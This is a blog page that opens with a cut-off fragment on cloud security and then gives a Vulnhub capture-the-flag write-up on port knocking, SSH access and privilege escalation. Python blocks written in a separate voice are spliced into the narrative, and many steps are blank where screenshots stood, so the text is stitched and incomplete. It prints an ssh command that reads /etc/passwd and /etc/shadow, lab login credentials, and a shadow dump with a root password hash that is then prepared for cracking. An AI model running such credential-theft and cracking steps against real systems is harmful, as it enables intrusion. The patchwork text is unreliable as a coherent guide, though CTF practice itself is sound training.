Security Testing for entities hosted in cloud

Applications that are being migrated to the cloud, or are planned to be hosted there, need additional security considerations. Failure to ensure proper security protection when using cloud services may result in higher costs and loss to the business. Organizations must consider security controls for the different service models, viz. Infrastructure as a Service (IaaS), Software as a Service (SaaS) and Platform as a Service (PaaS).

Which applications should be moved to the cloud?

- Low to medium risk

What are the key security risks while hosting in the cloud?

- Isolation failure: multi-tenancy is a key characteristic of the cloud. Failure of the controls that separate storage, memory, identity and access control, and routing between tenants is a huge risk.
- Authentication and authorization
- ...

Vulnhub_Fartknocker_Challenge_Writeup

I have always used Vulnhub to get exciting challenges for practice. I am very thankful to the Vulnhub team.

Recently a few of my friends, who are good penetration testers, failed a challenge because they could not discover anything except a web port. When I asked them whether they had checked for port knocking on the target... Well, I thought this was a great opportunity to start submitting my attempts at Vulnhub challenges. I wrote this write-up while explaining the challenge to my friends.

1] Discovering target


2] nmap scan


















3] Interacting with target on open port









Clicking on "Wooah" opened up a pcap file:










4] Looking at the TCP traffic for packets with Seq: 0 and Len: 0 (the initial SYNs) and noting their Dst Port, we get the following ports in the following sequence:

7000
8000
9000

7000
8000
9000
8888

Looking at this, it is very clear that this is a port-knocking challenge.

So let's knock the ports. We could write a script for this, but since it is just 7 ports we will knock them directly:
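Step 4 reads the knock sequence off the pcap by eye; the Python below is an added example (not the author's script) that does the same over a list of captured SYN packets and separates the repeated knock from the port it unlocked, then replays a knock with plain TCP connects. The packet records are constructed to mirror the sequence above, and the `knock()` helper is my assumption of how one would script the step.

```python
import socket

# Constructed packet records: (src_ip, dst_port, tcp_flags, payload_len).
# Flag bits: 0x02 = SYN, 0x10 = ACK, 0x08 = PSH. Only a bare SYN with no
# payload is a fresh connection attempt, which is what Wireshark shows as
# "Seq: 0 Len: 0" in step 4. The IPs and the trailing data packet are made up.
PACKETS = [
    ("10.0.2.4", 7000, 0x02, 0), ("10.0.2.4", 8000, 0x02, 0),
    ("10.0.2.4", 9000, 0x02, 0), ("10.0.2.4", 7000, 0x02, 0),
    ("10.0.2.4", 8000, 0x02, 0), ("10.0.2.4", 9000, 0x02, 0),
    ("10.0.2.4", 8888, 0x02, 0),
    ("10.0.2.15", 8888, 0x12, 0),    # SYN/ACK from the target, not a knock
    ("10.0.2.4", 8888, 0x18, 120),   # PSH/ACK carrying data, not a knock
]

def syn_ports(packets, src):
    """Destination ports of bare SYNs (no ACK, no payload) from src, in order."""
    return [dport for s, dport, flags, plen in packets
            if s == src and flags & 0x02 and not flags & 0x10 and plen == 0]

def split_knock(ports):
    """Split an ordered SYN port list into (knock_sequence, opened_ports).
    The knock is the shortest prefix the client repeated at least twice;
    whatever follows it and is not part of it is the service it unlocked.
    A list with no repetition yields ([], ports): nothing to separate."""
    for n in range(1, len(ports) // 2 + 1):
        prefix = ports[:n]
        reps = 0
        while ports[reps * n:(reps + 1) * n] == prefix:
            reps += 1
        if reps >= 2:
            rest = ports[reps * n:]
            return prefix, [p for p in rest if p not in prefix]
    return [], list(ports)

def knock(host, ports, timeout=0.5):
    """Replay a knock: one connect attempt (i.e. one SYN) per port, in order.
    Refused or timed-out connects are expected; only the SYN matters."""
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect_ex((host, port))
            except OSError:
                pass
```

Calling `split_knock(syn_ports(PACKETS, "10.0.2.4"))` returns `([7000, 8000, 9000], [8888])`, the same split the pcap shows by hand; the takeaway for a defender is that any capture of the client's traffic gives the sequence away.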








5] Now we have port 8888 open and a new directory: /burgerworld/

Let's open this in the browser:









6] Let's click on "hehh...hehh" and hope to get another pcap.

Yes, we got another pcap file.

Before dealing with it, let's do a quick nmap scan of port 8888; we may be able to use this later:














7] Okay, now let us look at the new pcap file:

Looking at it, there seem to be communication attempts on ports 21, 80, 8080 and 22, but no knocking sequence is visible:

A quick nmap scan against these ports did not reveal anything useful either.

I tried following the TCP stream in Wireshark and got this:














At first I did not understand what this meant, but after reading it out loud a couple of times it sounded similar to "3 3 7". Bingo, this might be 1337.

Confirmed it with Google:





Let's try and knock these ports:










Brilliant!

Now we have one more directory: /iamcornholio/

Let's open it in the browser.











This looks like some encoded text.

Let's try a base64 decode on it:





Great, so now we have the knocking sequence to open SSH.

Let's knock it:










Awesome!!!

Now that we have SSH open, let's try to interact with it.








So now we have an SSH username and password as well; I didn't expect to get them served so easily.

Let's try to log in:










Good. So the session is open only for a blink, but we can surely use SSH to run commands here.







So we issued 4 commands here:

ls

cat /etc/passwd

cat /etc/shadow

uname -a

The target responded positively to all of them :)

Yes, we got both the shadow and passwd files. Here is the output:

----------------------------------------------------------------------------------------------------------------------------
root@kali:~# ssh butthead@10.0.2.15 ls && cat /etc/passwd && cat /etc/shadow && uname -a
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #
############################################
butthead@10.0.2.15's password:
nachos
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:103:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
colord:x:103:107:colord colour management daemon,,,:/var/lib/colord:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
miredo:x:105:65534::/var/run/miredo:/bin/false
ntp:x:106:112::/home/ntp:/bin/false
Debian-exim:x:107:113::/var/spool/exim4:/bin/false
arpwatch:x:108:116:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
avahi:x:109:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
beef-xss:x:110:118::/var/lib/beef-xss:/bin/false
dradis:x:111:120::/var/lib/dradis:/bin/false
pulse:x:112:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
haldaemon:x:114:123:Hardware abstraction layer,,,:/var/run/hald:/bin/false
sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin
snmp:x:116:125::/var/lib/snmp:/bin/false
iodine:x:117:65534::/var/run/iodine:/bin/false
postgres:x:118:127:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
redsocks:x:119:128::/var/run/redsocks:/bin/false
stunnel4:x:120:129::/var/run/stunnel4:/bin/false
statd:x:121:65534::/var/lib/nfs:/bin/false
sslh:x:122:132::/nonexistent:/bin/false
Debian-gdm:x:123:133:Gnome Display Manager:/var/lib/gdm3:/bin/false
rtkit:x:124:134:RealtimeKit,,,:/proc:/bin/false
saned:x:125:135::/home/saned:/bin/false
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
redis:x:126:136:redis server,,,:/var/lib/redis:/bin/false
root:$6$5TZ6s8Rf$xTerBGvbFGqYM/dUVSe6qvE1J4vBd/JsTEPISFPqMPUl0fKC4YnuGpAsuh0vG0vacYxClaZwINrly4B2dRAz00:16590:0:99999:7:::
daemon:*:16506:0:99999:7:::
bin:*:16506:0:99999:7:::
sys:*:16506:0:99999:7:::
sync:*:16506:0:99999:7:::
games:*:16506:0:99999:7:::
man:*:16506:0:99999:7:::
lp:*:16506:0:99999:7:::
mail:*:16506:0:99999:7:::
news:*:16506:0:99999:7:::
uucp:*:16506:0:99999:7:::
proxy:*:16506:0:99999:7:::
www-data:*:16506:0:99999:7:::
backup:*:16506:0:99999:7:::
list:*:16506:0:99999:7:::
irc:*:16506:0:99999:7:::
gnats:*:16506:0:99999:7:::
nobody:*:16506:0:99999:7:::
libuuid:!:16506:0:99999:7:::
mysql:!:16506:0:99999:7:::
messagebus:*:16506:0:99999:7:::
colord:*:16506:0:99999:7:::
usbmux:*:16506:0:99999:7:::
miredo:*:16506:0:99999:7:::
ntp:*:16506:0:99999:7:::
Debian-exim:!:16506:0:99999:7:::
arpwatch:!:16506:0:99999:7:::
avahi:*:16506:0:99999:7:::
beef-xss:*:16506:0:99999:7:::
dradis:*:16506:0:99999:7:::
pulse:*:16506:0:99999:7:::
speech-dispatcher:!:16506:0:99999:7:::
haldaemon:*:16506:0:99999:7:::
sshd:*:16506:0:99999:7:::
snmp:*:16506:0:99999:7:::
iodine:*:16506:0:99999:7:::
postgres:*:16506:0:99999:7:::
redsocks:!:16506:0:99999:7:::
stunnel4:!:16506:0:99999:7:::
statd:*:16506:0:99999:7:::
sslh:!:16506:0:99999:7:::
Debian-gdm:*:16506:0:99999:7:::
rtkit:*:16506:0:99999:7:::
saned:*:16506:0:99999:7:::
vboxadd:!:16590::::::
redis:!:16600:0:99999:7:::
Linux kali 3.18.0-kali3-686-pae #1 SMP Debian 3.18.6-1~kali2 (2015-03-02) i686 GNU/Linux
root@kali:~#
-----------------------------------------------------------------------------------------------------------------------------------

Now the best bet is to take the shadow and passwd files and hand them over to John.
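Before handing the files to John they have to be merged into one line per user, which John's unshadow tool does; the Python below is an added example (not the author's code and not John's) that performs that merge and reports which accounts actually carry a hash, using constructed sample lines with the root hash replaced by a placeholder. One practical check first: `ssh host ls && cat /etc/shadow` hands only `ls` to ssh because the local shell splits the line at `&&`, so quote the whole command string (`ssh host 'ls && cat /etc/passwd && cat /etc/shadow'`) to make every piece run on the target.

```python
# Constructed sample files, not the challenge's real passwd/shadow: the root
# hash is a placeholder, and "testuser" exists only in passwd to show how a
# user with no shadow entry is handled.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
testuser:x:1001:1001::/home/testuser:/bin/bash
"""

SHADOW = """\
root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:16590:0:99999:7:::
daemon:*:16506:0:99999:7:::
libuuid:!:16506:0:99999:7:::
"""

def parse_colon_file(text):
    """Map user name -> field list for a passwd- or shadow-style file."""
    rows = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            rows[fields[0]] = fields
    return rows

def unshadow(passwd_text, shadow_text):
    """Put each user's shadow hash into passwd's second field, as John's
    unshadow does. Users with no shadow entry keep their passwd line."""
    shadow = parse_colon_file(shadow_text)
    merged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if fields[0] in shadow:
            fields[1] = shadow[fields[0]][1]
        merged.append(":".join(fields))
    return "\n".join(merged)

def crackable_accounts(shadow_text):
    """Users whose hash field is a real hash. Empty means no password,
    '*' means password login disabled, a leading '!' means locked."""
    shadow = parse_colon_file(shadow_text)
    return sorted(user for user, fields in shadow.items()
                  if fields[1] and fields[1] != "*"
                  and not fields[1].startswith("!"))
```

In the dump above every account except root has `*` or `!` in the hash field, so `crackable_accounts()` would leave John with exactly one target.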

But first, let's cat the file that we got as a result of ls:










So we kind of got our first flag :)

From the shadow and passwd files we already know that these users exist.

But before we do that, let's try this:

I searched the internet for the story around Beavis, Butthead, fartknocker etc. and got this (my idea was to find some story and gather a good wordlist from it using CeWL):









As it was created by Mike Judge, I tried that first, before brute-forcing:







And yes, we are in.

Now it's time to gear up to get root.

The first step we always try is sudo:





Yippee!!! We got root....









This was an interesting challenge and my 1st write-up for vulnhub. Thank you.


Harshwardhan Kamdi
(@G0tD4un1k)
